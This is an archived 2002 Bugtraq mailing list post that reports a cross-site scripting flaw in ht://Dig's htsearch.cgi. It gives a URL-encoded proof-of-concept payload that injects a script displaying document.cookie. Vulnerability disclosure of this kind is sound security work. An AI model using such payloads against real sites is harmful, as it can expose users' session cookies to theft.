Home page logo
/

bugtraq logo Bugtraq mailing list archives

XSS in HTDIG
From: Howard Yeend <h_bugtraq () yahoo com>
Date: Wed, 26 Jun 2002 01:38:48 -0700 (PDT)

Eg;

http://www.anyhost.com/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

(all URLS must be on one line)

Apologies if this is a known issue.
Apologies also for posting about XSS, too, but
this is not an isolated website, but a commonly
used service.

=====
-----BEGIN GEEK CODE BLOCK-----
  Version: 3.1 www.geekcode.com
GIT d--(---) s-:-- a-- C++++ UL@ P--- L++>+++ E---(-) W+++(-)$ N-(--) o-- K++ w(+)(-) O? !M ?V(-) PS+++@ PE-- Y+ PGP++ 
t+ 5-(++) X(+) R tv(--) b+>+++ DI++ D-(Quake+++) G+++ e* h r++>+++ y+(+++)
-----END GEEK CODE BLOCK-----

__________________________________________________
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
http://fifaworldcup.yahoo.com


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]